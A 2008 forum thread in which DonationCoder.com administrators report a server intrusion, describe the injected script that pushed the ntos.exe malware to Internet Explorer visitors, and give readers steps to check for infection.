News and Reviews > Official Announcements

Thread about the DonationCoder.com server Shutdown on March 2nd, 2008

(1/4) > >>

mouser:
I'm just going to start this thread now so that it's up, and then i'll add more in the coming days.

NOTE: A separate thread celebrating our coming back online after the outage is here.


Ct+paste of the message that was up on our server for the last 4 days for everyone that tried to access any page on the server:
What happened:

On Sunday morning, March 2nd, around 10:30am(EST), the server was hacked into by someone who used an exploit on a piece of older software to get root access.
Thankfully the attacker was only in the machine for 1-2 hours when the intrusion was discovered, and we immediately locked down access to all services.

There doesn't appear to be any data loss, but the attacker did manage to put up some sort of activex code on the homepage of the site which attempted to infect visitors of our homepage using older versions of Internet Explorer. If you visited the home page of the site on Sunday morning EST using Internet Explorer and noticed anything strange please make sure you run a virus scan on your computer. If the activex is allowed to run, it attempts to install a version of the ntos.exe virus on the users PC. To make sure you have not been infected, please go to the (C:\)Windows\System32\ directory on your PC and look for a file called "ntos.exe". If you do find a Windows\System32\ntos.exe file on your pc, then you need help removing the infection. Here is one page with some instructions. The virus is also detected by the free antivirus programs AVG and AntiVir.

Please note that none of our file downloads were ever compromised in any way.

We have decided that the best thing for us to do in order to be absolutely certain that the attack cannot be repeated is to reinstall new server software from scratch, with tighter security restrictions, and then restore the site content from known good backups.

We can't apologize enough for the downtime and inconvenience. It's heartbreaking to us that someone would do this to the site. The only thing we can do is re-dedicate ourselves to security and take the time to fix it properly so it never happens again.

Thank you for your understanding and patience. And thank you so much for your support while we work to bring the site back up.

-mouser, gothic, wordzilla, and rest of the DC team
--- End quote ---

mouser:
Let me quickly add a few words about the code that the hacker put on the homepage (actually it turns out it was also on a few more index.html pages on the site, like the Reviews/ start page).

We were fortunate to have a few white hack hacker types and some malware professionals take a look at what the code placed on the page was trying to do (thanks everyone on our irc channel -- #donationcoder on efnet).

Basically the code was some obfuscated javascript that simply opened a page on a far away site, which attempted to trigger some exploits in older versions of Internet Explorer.  It looks like it was some version of something called icepack/mpack, which believe it or not is a product that people SELL AND BUY for the explicit purpose of hacking computers.

The code was designed to try various tricks on people who were using Internet Explorer.  I actually tried in a virtual machine to let it infect me and it was a bit difficult since by default, the latter versions of Internet Explorer (v7 and on) have some pretty reasonable steps that try to warn you that something strange is happening and ask you if you want to install activeX components, etc.  But if you had an old version of Internet Explorer you may have been at risk -- please run an antivirus check to be sure.

I cannot tell you how distraught and angry i was when i found out that someone had put this code on our homepage.  I felt like I had let down the visitors to this site.  If i don't seem contrite enough at the moment, it's only because in the last 4 days since the server was down i have gradually calmed down from a state of hyperventilation.  The only thing now to do is go forward and work at making the site more secure.  Thanks to everyone on our IRC channel who put up with me freaking out, and who helped analyze the attack, and especially to DC member Jazper who alerted us about the initial intrusion so quickly so that we had the site wasn't exposed for more than an hour or so.

A few things to note about the code they added to the page that should give you some pause while surfing:

* The only thing they did to the page was add 1 line of javascript.
* That is enough to open a page on another site which can begin delivering you attempted exploit code designed to trick your browser into downloading and installing a virus.
* There is nothing special about it being on our server -- anyone who owns any site could put this code on their page without having to hack anything.
* In other words, the owner of any site on any page you ever visit could put code like this on their page to try to infect you.  It's just plain simple javascript.  No one needs to hack a site to put this code on their own created pages.
* What this means is that you should expect that if you do even a little bit of regular surfing, you need to be aware how important it is to have up-to-date software installed -- keep your browsers updated to latest versions, be on the lookout for announcements about possible security risks, have a good antivirus.
* Listen to your browser -- all new versions of IE and firefox will alert you if a site is trying to open and run some executable or active X.  If you get an unexpected pop-up question on a site asking if you want to run some addon or something, say no unless you know exactly what it's for.

f0dder:
It's worth to note that malware package is designed to do really nasty things, like stealing your banking information - so it's very important that you check whether you've been infected or not. The quick way is checking whether you have a file called ntos.exe in %SystemRoot\system32, like mouser mentioned above.

The scumbags that do this are obviously interested in getting as many people infected as possible, and while I don't know how many visitors we have per day, my guess is it's a fair amount of people.

This wasn't the typical defacing hack just to say i ownz j00, it was done by people with monetary crime in mind!

mouser:
A couple of good free antivirus tools:

* AVG
* AntiVir
By the way if anyone confirms that they were infected by this from our site (remember that the exploit was only in place for an hour or so on Sunday morning between 9a-11am ) please email me at mouser@donationcoder and let me know.

iphigenie:
Do you know how they got access to the pages in the first place?

When I had the problem 1.5 years ago they gained access to the tinyportal/smf uploads directory (cant remember which) and from this created some folders to put a warez server on. They didnt manage to change the pages, and couldnt do very much (thank goodness for BSD!) but still the bandwidth bill for 36 hours was.... about a year's hosting!

Do i need to worry and go check my site or can I just stay here and post some of the things I wanted to post last weekend?

Navigation

[0] Message Index

[#] Next page